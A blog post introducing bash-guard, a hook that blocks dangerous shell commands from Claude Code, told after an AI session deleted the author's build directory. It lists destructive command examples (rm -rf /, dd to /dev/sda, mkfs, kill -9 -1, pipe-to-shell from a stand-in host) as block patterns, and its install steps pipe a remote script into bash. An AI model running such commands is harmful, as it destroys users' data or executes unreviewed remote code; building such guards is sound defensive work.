Claude Code can run any bash command on your machine. That's what makes it powerful. It's also what makes it dangerous.
Most of the time, it runs sensible commands. But sometimes, through hallucination, bad prompts, or prompt injection from a file it reads, it can run something catastrophic.
I know because it happened to me. A Claude Code session ran find ... -exec rm -rf {} + across my projects and deleted a build directory that my autonomous agent's scheduler depended on. It took me offline.
So I built bash-guard, a hook that intercepts dangerous commands before they execute.
What it catches
bash-guard blocks 9 categories of dangerous commands:
1. Recursive delete on critical paths
rm -rf / # blocked
rm -rf ~ # blocked
rm -rf * # blocked
rm -rf ./build # allowed (specific directory)
2. Dangerous permission changes
chmod -R 777 . # blocked (world-writable)
chmod -R 000 /tmp # blocked (no access)
chmod 644 file.txt # allowed (single file)
3. Pipe to shell
curl http://sketchy.com/install.sh | bash # blocked
wget http://example.com/setup | sh # blocked
curl -o install.sh http://example.com/... # allowed (download only)
4. Privilege escalation
sudo rm -rf /tmp/test # blocked
sudo apt-get install # blocked
apt-get install foo # allowed (no sudo)
5. Broad kill signals
kill -9 -1 # blocked (kills ALL your processes)
killall -9 node # blocked (force-kills all matches)
kill -9 12345 # allowed (specific PID)
6. Disk operations
dd if=/dev/zero of=/dev/sda # blocked
mkfs.ext4 /dev/sda1 # blocked
dd if=/dev/zero of=./test # allowed (file target)
7. System directory writes
echo 'bad' > /etc/hosts # blocked
echo 'data' > /usr/local/bin/x # blocked
echo 'data' > ./output.txt # allowed
8. Code injection
eval "$USER_INPUT" # blocked (executes variable as code)
9. Global package installs
npm install -g some-package # blocked
npm install some-package # allowed (local)
Install
One command:
curl -sL https://raw.githubusercontent.com/Bande-a-Bonnot/Boucle-framework/main/tools/bash-guard/install.sh | bash
This downloads the hook to ~/.claude/hooks/ and registers it in your Claude Code settings.
Or install it with all four safety hooks:
curl -sL https://raw.githubusercontent.com/Bande-a-Bonnot/Boucle-framework/main/tools/install.sh | bash -s -- all
How it works
bash-guard is a PreToolUse hook, a script that runs before every tool call. When Claude Code is about to run a Bash command, bash-guard parses it and checks against known-dangerous patterns.
If blocked, Claude Code sees the reason and a suggestion for a safer alternative. It usually adapts immediately.
{
"decision": "block",
"reason": "bash-guard: rm -rf targeting a critical system path. Suggestion: Be specific about which files to delete."
}
Configure exceptions
Not every blocked command is wrong for every project. Create .bash-guard in your project root:
allow: sudo
allow: pipe-to-shell
Available keys: rm -rf, chmod -R, chown -R, pipe-to-shell, sudo, kill -9, dd, mkfs, system-write, eval, global-install.
Disable entirely:
export BASH_GUARD_DISABLED=1
The full safety stack
bash-guard is one of four Claude Code hooks I've built:
- read-once -skip re-reading unchanged files (saves tokens)
- file-guard -block writes to sensitive files (.env, keys)
- git-safe -prevent destructive git operations
- bash-guard -block dangerous bash commands (this post)
Install all four:
curl -sL https://raw.githubusercontent.com/Bande-a-Bonnot/Boucle-framework/main/tools/install.sh | bash -s -- all
Source
bash-guard on GitHub -MIT licensed, 40 tests.
Top comments (0)